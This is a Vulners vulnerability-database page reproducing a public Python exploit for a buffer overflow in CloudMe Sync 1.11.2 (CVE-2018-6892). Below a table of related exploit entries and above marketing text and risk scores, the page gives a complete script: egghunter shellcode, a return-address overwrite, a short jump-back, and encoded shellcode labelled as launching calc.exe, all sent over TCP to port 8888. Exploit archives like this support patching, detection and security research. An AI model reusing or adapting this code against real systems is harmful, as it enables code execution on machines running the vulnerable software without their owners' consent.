Vulners
Lucene search
CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt
| Reporter | Title | Published | Views | Family All 35 |
|---|---|---|---|---|
 | CloudMe Sync 1.10.9 Remote Buffer Overflow Vulnerability | 12 Feb 201800:00 | – | zdt |
| CloudMe Sync 1.10.9 Buffer Overflow Exploit | 23 Feb 201800:00 | – | zdt |
| CloudMe Sync 1.9.2 Remote Buffer Overflow Exploit | 6 Mar 201800:00 | – | zdt |
| Cloudme 1.9 - Buffer Overflow (DEP) Учздщше | 14 Aug 201800:00 | – | zdt |
| CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt Exploit | 22 Jan 201900:00 | – | zdt |
| CloudMe Sync 1.11.2 Buffer Overflow - WoW64 - (DEP Bypass) Exploit | 28 Jan 201900:00 | – | zdt |
| CloudMe 1.11.2 SEH Buffer Overflow Exploit | 3 Aug 202000:00 | – | zdt |
| CloudMe 1.11.2 - Buffer Overflow ROP (DEP,ASLR) Exploit (2) | 29 Sep 202000:00 | – | zdt |
 | CVE-2018-6892 | 13 Feb 201800:00 | – | circl |
 | CloudMe Buffer Overflow Vulnerability | 12 Feb 201800:00 | – | cnvd |
10
#######################################################
# Exploit Title: CloudMe Sync v1.11.2 Buffer Overflow + Egghunt
# Date: 23.04.2018
# Exploit Author:T3jv1l
# Vendor Homepage:https://www.cloudme.com/en
# Software: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Category:Local
# Contact:https://twitter.com/T3jv1l
# Version: CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt
# Tested on: Windows 7 SP1 x86
# CVE-2018-6892
# Real exploit https://www.exploit-db.com/exploits/44027 in version 1.11.0
# Hello subinacls and NytroRST !
#############################################################
import socket
egg = (
"\x66\x81\xca\xff\x0f\x42\x52\x6a"
"\x02\x58\xcd\x2e\x3c\x05\x5a\x74" #boom
"\xef\xb8\x62\x6f\x6f\x6d\x8b\xfa"
"\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
target="127.0.0.1"
junk="A"*1015
jmp="\xd9\x37\x99\x69" #0x699937d9 push ret
jump_back="\xeb\xc4" #jump -60 bytes
#Shellcode calc.exe
buf = ""
buf +="\xba\xd5\x31\x08\x38\xdb\xcb\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
buf +="\x33\x83\xc3\x04\x31\x53\x0e\x03\x86\x3f\xea\xcd\xd4\xa8\x63"
buf +="\x2d\x24\x29\x14\xa7\xc1\x18\x06\xd3\x82\x09\x96\x97\xc6\xa1"
buf +="\x5d\xf5\xf2\x32\x13\xd2\xf5\xf3\x9e\x04\x38\x03\x2f\x89\x96"
buf +="\xc7\x31\x75\xe4\x1b\x92\x44\x27\x6e\xd3\x81\x55\x81\x81\x5a"
buf +="\x12\x30\x36\xee\x66\x89\x37\x20\xed\xb1\x4f\x45\x31\x45\xfa"
buf +="\x44\x61\xf6\x71\x0e\x99\x7c\xdd\xaf\x98\x51\x3d\x93\xd3\xde"
buf +="\xf6\x67\xe2\x36\xc7\x88\xd5\x76\x84\xb6\xda\x7a\xd4\xff\xdc"
buf +="\x64\xa3\x0b\x1f\x18\xb4\xcf\x62\xc6\x31\xd2\xc4\x8d\xe2\x36"
buf +="\xf5\x42\x74\xbc\xf9\x2f\xf2\x9a\x1d\xb1\xd7\x90\x19\x3a\xd6"
buf +="\x76\xa8\x78\xfd\x52\xf1\xdb\x9c\xc3\x5f\x8d\xa1\x14\x07\x72"
buf +="\x04\x5e\xa5\x67\x3e\x3d\xa3\x76\xb2\x3b\x8a\x79\xcc\x43\xbc"
buf +="\x11\xfd\xc8\x53\x65\x02\x1b\x10\x99\x48\x06\x30\x32\x15\xd2"
buf +="\x01\x5f\xa6\x08\x45\x66\x25\xb9\x35\x9d\x35\xc8\x30\xd9\xf1"
buf +="\x20\x48\x72\x94\x46\xff\x73\xbd\x24\x9e\xe7\x5d\x85\x05\x80"
buf +="\xc4\xd9"
payload1=junk+egg+"B"*5 + jmp + jump_back
payload2="boomboom" + buf
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,8888))
s.send(payload1+payload2)
except:
print "Don't Crash Me !"Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Jan 2019 00:00Current
8.8High risk
Vulners AI Score8.8
CVSS 27.5
CVSS 39.8
EPSS0.89668